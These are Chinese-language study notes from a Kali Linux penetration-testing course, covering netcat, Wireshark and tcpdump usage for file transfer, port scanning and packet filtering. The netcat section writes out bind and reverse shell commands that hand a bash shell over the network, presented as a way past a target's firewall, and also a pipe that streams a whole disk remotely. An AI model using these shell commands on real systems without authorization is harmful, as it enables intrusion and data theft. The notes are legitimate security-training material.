KALI LINUX渗透测试学习笔记之三.基本⼯具

基本⼯具
NETCAT ——NC
• 侦听模式 / 传输模式
• telnet / 获取banner信息
• 传输⽂本信息
• 传输⽂件/⺫录
• 加密传输⽂件
• 远程控制/⽊⻢
• 加密所有流量
• 流媒体服务器
• 远程克隆硬盘
NC——TELNET / BANNER
• nc –nv 192.168.1.10  110 
• nc –nv 192.168.1.11
• nc –nv 192.168.1.10 
NC——传输⽂本信息
• A：nc -l -p 4444 
• B：nc –nv 192.168.1.10 4444 
• A：nc -l -p 4444
• B：ls -l | nc –nv 192.168.1.10 4444 
NC——传输⽂件/目录
• 传输⽂件
• A：nc -lp 333 > 1.mp4
• B：nc -nv 192.168.1.10  333 < 1.mp4 –q 1
• 或 • A：nc -q 1 -lp 333 < a.mp4
• B： nc -nv 192.168.1.10 333 > 2.mp4
• 传输目录
• A：tar -cvf - music/ | nc -lp 333 –q 1
• B：nc -nv 1.1.1.1 333 | tar -xvf –
• 加密传⽂件
• A：nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
• B： mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 192.168.1.10 333 -q 1
NC——端⼝扫描
• nc –vnzu 192.168.1.10 1-1024
NC——远程克隆硬盘
• A： nc -lp 333 | dd of=/dev/sda 
• B： dd if=/dev/sda | nc -nv 192.168.1.10 333 –q 1 
• 远程电⼦取证，可以将⺫标服务器硬盘远程复制，或者内存。
NC——远程控制
• 正向：
• A：nc -lp 333 -c bash
• B：nc - vn 192.168.1.10 333
• 反向：
• A：nc -lp 333
• B：nc -vn 192.168.1.10 333 -c bash
用于被攻击者端口存在防火墙保护，开放自身端口，然后通过被攻击者端口扫描获取连接
• Nc缺乏加密和⾝份验证的能⼒
WIRESHARK
• 抓包嗅探协议分析
• 安全专家必备的技能
• 抓包引擎
• Libpcap9—— Linux
• Winpcap10—— Windows
• 解码能⼒
WIRESHARK——基本使⽤⽅法
• 启动
• 选择抓包网卡
• 混杂模式
• 实时抓包
• 保存和分析捕获⽂件
• ⾸选项
WIRESHARK——筛选器
• 过滤掉干扰的数据包
• 抓包筛选器
• 显⽰筛选器
WIRESHARK——常⻅协议包
• 数据包的分层结构
• Arp 
• Icmp 
• Tcp——三次握⼿
• Udp 
• Dns 
• http 
• ftp
WIRESHARK——TCP
• 数据流
• http
• Smtp
• Pop3
• Ssl
WIRESHARK——信息统计
• 节点数
• 协议分布
• 包⼤⼩分布
• 会话连接
• 解码⽅式
• 专家系统
• 抓包对⽐nc、ncat加密与不加密的流量
TCPDUMP
• No-GUI的抓包分析⼯具
• Linux、Unix系统默认安装
TCPDUMP——抓包
• 抓包
• tcpdump -i eth0 -s 0 -w file.pcap
• 读取抓包⽂件
• Tcpdump -r file.pcap
TCPDUMP——筛选
• tcpdump -n -r http.cap | awk '{print $3}'| sort –u 
• tcpdump -n src host 145.254.160.237 -r http.cap 筛选源IP为145.254.160.237
• tcpdump -n dst host 145.254.160.237 -r http.cap 筛选源IP为145.254.160.237 
• tcpdump -n port 53 -r http.cap 筛选端口号
• tcpdump -nX port 80 -r http.cap 筛选端口号
TCPDUMP——⾼级筛选
• tcpdump -A -n 'tcp[13] = 24' -r http.cap 字节筛选，13号字节为24
注释：本笔记依据《安全牛 苑房弘kali渗透测试课程》学习整理实验